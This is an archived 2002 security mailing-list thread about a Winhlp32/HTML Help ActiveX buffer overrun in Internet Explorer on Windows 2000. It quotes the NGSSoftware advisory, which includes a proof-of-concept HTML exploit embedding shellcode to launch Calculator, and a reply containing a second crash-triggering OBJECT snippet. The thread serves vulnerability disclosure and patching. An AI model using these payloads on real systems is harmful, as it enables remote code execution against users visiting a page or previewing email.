Re: Winhelp32 Remote Buffer Overrun

From: Mark Litchfield (markat_private)
Date: Tue Aug 06 2002 - 12:23:38 PDT

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-034.0] Linux: buffer overflow in multiple DNS resolver libraries"

Previous message: GreyMagic Software: "RE: Bypassing cookie restrictions in IE 5+6"
In reply to: Jelmer: "Re: Winhelp32 Remote Buffer Overrun"
Next in thread: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Next in thread: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Reply: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

If I am not mistaken, I believe that Microsoft are aware of this issue and
have an IE patch comming out very shortly.  My brother reported this to
them, please see http://www.nextgenss.com/vna/ms-whelp.txt

Regards

Cheers,


Mark Litchfield

----- Original Message -----
From: "Jelmer" <jelmerat_private>
To: "Next Generation Insight Security Research Team" <markat_private>;
<bugtraqat_private>; <ntbugtraqat_private>
Sent: Thursday, August 01, 2002 5:19 PM
Subject: Re: Winhelp32 Remote Buffer Overrun


> I just installed servicepack 3 and the following code still crashed my my
> IE6 with a memory could not be refferenced error.
>
>  <OBJECT ID=hhctrl TYPE="application/x-oleobject"
> CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
>     <PARAM name="Command" value="Shortcut">
>     <PARAM name="Button" value="Bitmap:shortcut">
>     <PARAM name="Item1" value=",,">
>     <PARAM name="Item2" value="273,1,1">
>     <PARAM name="codebase" value="">
>     <PARAM name="Font" value=" A VERY VERY LONG STRING ">
> </OBJECT>
>
> I have been told this means it is most likely exploitable. I am not into
> buffer overflows myself though, maybe someone can confirm this. Anyways I
> notified microsoft of this several months ago. The day after I notified
them
> someone pointed me to the ngssoftware advisory *sob*, and I notified
> microsoft that this was probably the same issue, last I heard from them
they
> where looking in to if this was indeed the case. It's been several months
> and as far as I know they are still looking.
>
> --
>  jelmer
>
> ----- Original Message -----
> From: "Next Generation Insight Security Research Team"
> <markat_private>
> To: <bugtraqat_private>; <ntbugtraqat_private>
> Sent: Friday, August 02, 2002 3:59 AM
> Subject: Winhelp32 Remote Buffer Overrun
>
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> >
> > NGSSoftware Insight Security Research Advisory
> >
> > Name:    Winhlp32.exe Remote BufferOverrun
> > Systems Affected:  Win2K Platform
> > Severity:  Critical
> > Category:               Remote Buffer Overrun
> > Vendor URL:   http://www.mircosoft.com
> > Author:   Mark Litchfield (markat_private)
> > Date:   1st August 2002
> > Advisory number: #NISR01082002
> >
> >
> > Description
> > ***********
> >
> > Many of the features available in HTML Help are implemented through
> > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
> > control is used to provide navigation features (such as a table of
> > contents), to display secondary windows and pop-up definitions, and
> > to provide other features. The HTML Help ActiveX control can be used
> > from topics in a compiled Help system as well as from HTML pages
> > displayed in a Web browser. The functionality provided by the HTML
> > Help ActiveX control will run in the HTML Help Viewer or in any
> > browser that supports ActiveX technology, such as Internet Explorer
> > (version 3.01 or later). Some features, as with the WinHlp Command,
> > provided by the HTML Help ActiveX control are meant to be available
> > only when it is used from a compiled HTML Help file (.chm) that is
> > displayed by using the HTML Help Viewer.
> >
> > Details
> > *******
> >
> > Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
> > parameter within WinHlp Command, the item parameter is used to
> > specify the file path of the WinHelp (.hlp) file in which the WinHelp
> > topic is stored, and the window name of the target window.  Using
> > this overrun, an attacker can successfully exectute arbitary code on
> > a remote system by either encouraging the victim to visit a
> > particular web page, whereby code would execute automatically, or by
> > including the exploit within the source of an email.  In regards to
> > email, execution would automatically occur when the mail appears in
> > the preview pane and ActiveX objects are allowed (This is allowed by
> > default, the Internet Security Settings would have to be set as HIGH
> > to prevent execution of this vulnerability). Any exploit would
> > execute in the context of the logged on user.
> >
> > Visual POC Exploit
> > ******************
> >
> > This POC will simply display Calculator.  Please note that this
> > written on a Win2k PC with SP2 installed.  I have not tested it on
> > anything else.
> >
> > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
> > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
> > type=application/x-oleobject width=0><PARAM NAME="Width"
> > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
> > VALUE="WinHelp"><PARAM NAME="Item1"
> > VALUE="3ÀPhcalc4$&#402;À&#1;PV¸¯§éwÿÐ3ÀP¾&#8221;éwÿÖAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
> > PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH&#402;Æ&#21;ÿægMyWindow"><PARAM
> > NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
> > <SCRIPT>winhelp.HHClick()</SCRIPT>
> >
> >
> > Fix Information
> > ***************
> >
> > NGSSoftware alerted Microsoft to these problems on the 6th March
> > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
> > as the fix has been built into this service pack found at
> > http://www.microsoft.com
> > An alternative to these patches would be to ensure the security
> > settings found in the Internet Options is set to high. Despite the
> > Medium setting, stating that unsigned ActiveX controls will not be
> > downloaded, Kylie will still execute Calc.exe.  Another alternative
> > would be to remove winhlp32.exe if it is not required within your
> > environment.
> > A check for these issues has been added to Typhon II, of which more
> > information is available from the
> > NGSSoftware website, http://www.ngssoftware.com.
> >
> > Further Information
> > *******************
> >
> > For further information about the scope and effects of buffer
> > overflows, please see
> >
> > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
> > http://www.ngssoftware.com/papers/ntbufferoverflow.html
> > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
> > http://www.ngssoftware.com/papers/unicodebo.pdf
> >
> >
> >
> >
> >
> >
> >
> >
> > -----BEGIN PGP SIGNATURE-----
> > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
> >
> > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
> > a+qSkYWrz7uspZcqqRTc2r0C
> > =2PKN
> > -----END PGP SIGNATURE-----
> >
> >
> >
> >
>
>
>

Next message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-034.0] Linux: buffer overflow in multiple DNS resolver libraries"
Previous message: GreyMagic Software: "RE: Bypassing cookie restrictions in IE 5+6"
In reply to: Jelmer: "Re: Winhelp32 Remote Buffer Overrun"
Next in thread: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Next in thread: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Reply: Drew: "RE: Winhelp32 Remote Buffer Overrun"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Aug 06 2002 - 18:37:14 PDT